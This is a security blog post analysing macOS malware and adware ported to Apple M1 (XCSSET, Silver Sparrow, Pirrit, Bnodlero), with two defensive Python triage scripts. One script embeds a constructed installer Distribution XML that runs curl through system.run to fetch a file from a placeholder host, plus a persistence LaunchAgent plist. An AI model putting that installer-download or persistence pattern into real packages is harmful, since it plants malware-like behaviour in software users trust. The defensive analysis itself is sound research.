Good old malware for the new Apple Silicon platform

Introduction

A short while ago, Apple released Mac computers with its new chip, the Apple M1. The unexpected release was a milestone for Apple hardware. However, as the technology evolves, we also observe a growing interest in the new platform from malware authors, which inevitably leads to new malware samples compiled for Apple Silicon. In this article, we take a look at threats for Macs with the Apple M1 chip on board. We have also prepared a short FAQ section at the end of the article for those who want to better understand the security risks of M1 malware. Let’s dive in.

XCSSET malware

Last year, a threat called XCSSET was discovered for the first time. It targets mainly Mac developers and uses a unique way of distribution: injecting a malicious payload into Xcode IDE projects on the victim’s Mac. The payload is executed when the project is built in Xcode. XCSSET modules have numerous capabilities, such as:

  • Reading and dumping Safari cookies,
  • Injecting malicious JavaScript code into various websites,
  • Stealing user files and information from applications, such as Notes, WeChat, Skype, Telegram, etc.,
  • Encrypting user files.

All these various features, in combination with high stealth and an unusual way of distribution, make XCSSET a dangerous threat for Mac computers.

While exploring the various executable modules of XCSSET, we found that some of them also contained samples compiled specifically for the new Apple Silicon chips. For example, the sample with the MD5 hash sum 914e49921c19fffd7443deee6ee161a4 contains two architectures: x86_64 and ARM64.

The first corresponds to previous-generation, Intel-based Mac computers; the second is compiled for the ARM64 architecture, which means that it can run natively on computers with the new Apple M1 chip. According to VirusTotal, this sample was first uploaded on 2021-02-24 21:06:05, and the original research report contained neither this hash nor a module named “metald” (the name of the executable file). With this information in hand, we can assume that the XCSSET campaign is probably still ongoing, and that more and more malware writers are actively recompiling their samples to run natively on the new Apple Silicon Macs.

Silver Sparrow threat

XCSSET is not the only family that has adapted to run natively on Apple Silicon. According to a Red Canary report, a new threat called Silver Sparrow has been identified. It introduces a new way for malware writers to abuse the standard macOS installer package functionality: instead of placing a malicious payload in preinstall or postinstall scripts, the malware writers hid one in the package’s Distribution XML file.

This payload uses the installer’s JavaScript API to run bash commands that download a JSON configuration file.

[Figure: Downloading of JSON config]

After the configuration file has been downloaded, the sample extracts a URL from its downloadURL field and uses it for the next download.

[Figure: Downloading and executing a payload]

A Launch Agent is also created so that the malicious sample is executed persistently.

[Figure: Malware persistence]

This JavaScript payload can be executed regardless of chip architecture, but the package file with the MD5 hash sum fdd6fb2b1dfe07b0e57d4cbfef9c8149 contains a “fat” Mach-O supporting two architectures (ARM64 and x86_64), unlike the older package with the MD5 hash sum 30c9bc7d40454e501c358f77449071aa. This means that the malware actors are trying to expand their attack coverage by supporting a wider range of platforms.
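The two artifacts described above, a Distribution XML that shells out from the installer’s JavaScript API and a Launch Agent that keeps the downloaded payload running, are both plain text and can be triaged without executing the package. The script below is an example added here, not code from the original post, from Red Canary, or from the Silver Sparrow package; the Distribution XML and the plist it inspects are constructed samples that only imitate the structure, and the hostnames and paths in them are placeholders.

```python
"""Triage a macOS installer Distribution XML and a LaunchAgent plist for the
patterns described above. Example code added here; the inputs are constructed."""
import plistlib
import re
import xml.etree.ElementTree as ET

# Constructed Distribution XML: the installer JavaScript API (system.run) is used
# during the pre-install check to run a shell command that fetches a config file.
DISTRIBUTION_XML = """<installer-gui-script minSpecVersion="2">
  <title>Example Update</title>
  <options customize="never" allow-external-scripts="yes"/>
  <installation-check script="checkReady()"/>
  <script>
  function checkReady() {
      var cmd = "curl -s http://config.example.invalid/agent.json -o /tmp/agent.json";
      system.run("/bin/bash", "-c", cmd);
      return true;
  }
  </script>
  <choices-outline><line choice="default"/></choices-outline>
  <choice id="default"><pkg-ref id="com.example.pkg"/></choice>
  <pkg-ref id="com.example.pkg" version="1.0">#example.pkg</pkg-ref>
</installer-gui-script>
"""

# Constructed LaunchAgent plist that would re-run a dropped shell script.
LAUNCH_AGENT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>~/Library/._example/agent.sh</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>
"""

SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")
URL_RE = re.compile(r"https?://[^\s\"']+")
SYSTEM_RUN_RE = re.compile(r"system\.run\(([^)]*)\)")


def inspect_distribution(xml_text):
    """Report whether external scripts are allowed, every system.run() call found
    in <script> blocks (with its argument list), and any URLs embedded in them."""
    root = ET.fromstring(xml_text)
    findings = {"allow_external_scripts": False, "system_run_calls": [], "urls": []}
    options = root.find("options")
    if options is not None and options.get("allow-external-scripts") == "yes":
        findings["allow_external_scripts"] = True
    for script in root.iter("script"):
        body = script.text or ""
        findings["system_run_calls"].extend(m.group(1).strip() for m in SYSTEM_RUN_RE.finditer(body))
        findings["urls"].extend(URL_RE.findall(body))
    return findings


def is_suspicious(findings):
    """A package whose installer JavaScript spawns a shell, or that carries a
    download URL in its script, deserves a closer look before installation."""
    if any(shell in args for args in findings["system_run_calls"] for shell in SHELLS):
        return True
    return bool(findings["urls"])


def inspect_launch_agent(plist_bytes):
    """Summarise the persistence settings of a LaunchAgent/LaunchDaemon plist."""
    plist = plistlib.loads(plist_bytes)
    args = plist.get("ProgramArguments", [])
    return {
        "label": plist.get("Label"),
        "program": " ".join(args),
        "run_at_load": bool(plist.get("RunAtLoad", False)),
        "interval": plist.get("StartInterval"),
        # A shell wrapper around a script in the user's Library is a common shape for dropped agents.
        "shell_wrapper": bool(args) and args[0] in SHELLS,
    }


if __name__ == "__main__":
    dist = inspect_distribution(DISTRIBUTION_XML)
    print("Distribution findings:", dist, "suspicious:", is_suspicious(dist))
    print("LaunchAgent:", inspect_launch_agent(LAUNCH_AGENT_PLIST))
```

To run this against a real package, expand it with `pkgutil --expand`, feed the resulting `Distribution` file to `inspect_distribution`, and feed any plist the package writes under `~/Library/LaunchAgents` to `inspect_launch_agent`; the `allow-external-scripts` attribute and the `system.run` call are the two things to look at first.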

Adware threats for the new platform

However, malware samples are not the only ones that can be launched on Apple Silicon. The well-known Mac malware researcher Patrick Wardle recently published a post covering the Pirrit adware. Though it is an old and well-known adware family, it is still actively updated by its authors, and new samples are encountered in the wild quite often.

These updates include:

  • Anti-debug techniques such as using ptrace syscall with a PT_DENY_ATTACH flag,
  • Control flow obfuscation techniques,
  • Dynamic imports with dlsym calls to avoid static analysis,
  • Virtual machine detection as an anti-analysis measure.

[Figure: Control flow obfuscation; dynamic symbol resolving with dlsym]

Besides these improvements in the regular Intel x86_64 samples, new ARM64 samples were introduced. These are crafted specifically for the Apple Silicon M1 chip, but the consequences of running them are roughly the same: launching Pirrit adware results in pop-ups, banners and various annoying advertisements being displayed on the victim’s Mac.

Pirrit is not the only adware family to have begun supporting the Apple Silicon platform recently. For example, we also observed an ARM64 Bnodlero adware sample (MD5 82e02c1ca8dfb4c60ee98dc877ce77c5), which runs a bash downloader script using the system() function.

[Figure: Bash downloader executed by the Bnodlero sample]

Frequently Asked Questions

What is so special about M1 threats?

Well, frankly speaking, there is not much special about them. The only thing that distinguishes the new Apple M1 threats from previous ones targeting Intel-based Mac computers is the processor architecture for which the executable is compiled. To get their applications running on Apple Silicon, software developers must recompile their code into executables that can run on the M1 chip. The same is true for malware adversaries.

Is the Apple M1 chip less secure than Intel ones?

No, it is just a matter of platform support in malware executables.

Are Intel-based Macs affected by M1 threats?

Yes and no. On the one hand, code that is compiled exclusively for the Apple Silicon platform cannot be executed natively on the Intel x86_64 architecture. On the other hand, malicious samples are often delivered as so-called “fat” Mach-O binaries, which usually contain the same code compiled for several architectures. This means that running such a “fat” executable launches the malicious code matching your platform’s architecture. The Pirrit and Bnodlero samples are good examples of this approach.
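The question of which architectures a sample carries comes up throughout this article: the XCSSET “metald” module and the newer Silver Sparrow package both ship as “fat” Mach-O files with x86_64 and ARM64 slices, and the answer above explains why that matters for Intel users. The parser below reads the fat header and the thin Mach-O header to list those slices; it is an example added here, not code from the original post or from any of the samples discussed, and the header bytes it runs on are constructed (valid headers describing empty slices, not real malware). The slice-count limit used to tell a fat header apart from a Java class file, which starts with the same magic bytes, is a heuristic chosen for this example.

```python
"""List the CPU architectures inside a Mach-O file image, so a "fat" binary
carrying both x86_64 and ARM64 slices is recognised during triage.
Example code added here; the sample headers below are constructed."""
import struct
import sys

FAT_MAGIC = 0xCAFEBABE     # fat header with 32-bit slice offsets, stored big-endian
FAT_MAGIC_64 = 0xCAFEBABF  # fat header with 64-bit slice offsets, stored big-endian
MH_MAGIC = 0xFEEDFACE      # 32-bit thin Mach-O, stored in the target's byte order
MH_MAGIC_64 = 0xFEEDFACF   # 64-bit thin Mach-O, stored in the target's byte order
CPU_ARCH_ABI64 = 0x01000000
CPU_NAMES = {
    0x7: "i386",
    0x7 | CPU_ARCH_ABI64: "x86_64",
    0xC: "arm",
    0xC | CPU_ARCH_ABI64: "arm64",
}
MAX_PLAUSIBLE_SLICES = 32  # heuristic: real fat files have a handful of slices


def _cpu_name(cputype):
    return CPU_NAMES.get(cputype, "cpu_0x%x" % cputype)


def mach_o_architectures(data):
    """Return the architecture names in a Mach-O image: one per slice for a fat
    file, exactly one for a thin file. Raises ValueError for anything else."""
    if len(data) < 8:
        raise ValueError("too short to be a Mach-O file")
    magic_be = struct.unpack_from(">I", data, 0)[0]
    if magic_be in (FAT_MAGIC, FAT_MAGIC_64):
        nfat_arch = struct.unpack_from(">I", data, 4)[0]
        # Java class files also begin with 0xCAFEBABE, followed by a version
        # number rather than a small slice count; reject implausible counts.
        if nfat_arch == 0 or nfat_arch > MAX_PLAUSIBLE_SLICES:
            raise ValueError("0xCAFEBABE magic with an implausible slice count; not a fat Mach-O")
        # struct fat_arch (20 bytes) or struct fat_arch_64 (32 bytes); cputype comes first.
        entry_fmt = ">IIIII" if magic_be == FAT_MAGIC else ">IIQQII"
        entry_size = struct.calcsize(entry_fmt)
        archs = []
        for i in range(nfat_arch):
            cputype = struct.unpack_from(entry_fmt, data, 8 + i * entry_size)[0]
            archs.append(_cpu_name(cputype))
        return archs
    # Thin Mach-O: magic and cputype are stored in the target's own byte order.
    for order in ("<", ">"):
        magic, cputype = struct.unpack_from(order + "II", data, 0)
        if magic in (MH_MAGIC, MH_MAGIC_64):
            return [_cpu_name(cputype)]
    raise ValueError("not a Mach-O file")


def runs_natively_on_apple_silicon(data):
    """True if an arm64 slice is present; an x86_64-only file would need Rosetta 2."""
    return "arm64" in mach_o_architectures(data)


def build_fat_header(cputypes):
    """Constructed test input: a fat header whose slices are empty (no code)."""
    header = struct.pack(">II", FAT_MAGIC, len(cputypes))
    first_slice_offset = 8 + 20 * len(cputypes)
    for cputype in cputypes:
        header += struct.pack(">IIIII", cputype, 0, first_slice_offset, 0, 14)
    return header


# Constructed samples: a two-slice fat header, a thin arm64 mach_header_64, and a
# Java class-file header that shares the fat magic but is not a Mach-O.
SAMPLE_FAT = build_fat_header([0x7 | CPU_ARCH_ABI64, 0xC | CPU_ARCH_ABI64])
SAMPLE_THIN_ARM64 = struct.pack("<8I", MH_MAGIC_64, 0xC | CPU_ARCH_ABI64, 0, 2, 0, 0, 0, 0)
SAMPLE_CLASS_FILE = struct.pack(">IHH", 0xCAFEBABE, 0, 52)

if __name__ == "__main__":
    # Pass a file path to inspect a real binary; otherwise run on the constructed samples.
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read(4096)
        print(sys.argv[1], mach_o_architectures(image))
    else:
        for name, image in (("fat", SAMPLE_FAT), ("thin arm64", SAMPLE_THIN_ARM64)):
            print(name, mach_o_architectures(image), "native on M1:", runs_natively_on_apple_silicon(image))
```

The same information is available from `lipo -archs` or `file` on macOS; the value of doing it by hand is seeing that the fat header is nothing more than a big-endian table of cputype values in front of the slices, which is what the “fat” samples mentioned in this article contain.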

Can threats for Intel-based Macs run on Apple M1?

Yes, they can. Thanks to the Rosetta 2 feature, newly released Mac computers with the Apple M1 can also run malicious code compiled exclusively for the Intel x86_64 architecture. This backward compatibility will certainly be abused by malware operators until Apple completes the transition to its own chips.

Is there an upward trend in M1 malware?

Yes, there certainly is, and it is absolutely to be expected. As soon as a platform becomes more popular or highly anticipated, developers try to ensure that their software is available for it. Malware developers are no exception.

Conclusion

With the new M1 chip, Apple has certainly pushed its performance and energy saving limits on Mac computers, but malware developers kept an eye on those innovations and quickly adapted their executables to Apple Silicon by porting the code to the ARM64 architecture.

We have observed various attempts to port executables, not just among typical adware such as the Pirrit and Bnodlero samples, but also among malicious packages, such as the Silver Sparrow threat and the downloadable malicious modules of XCSSET. This will certainly give other malware adversaries a kickstart to begin adapting their code to run on Apple M1 chips.
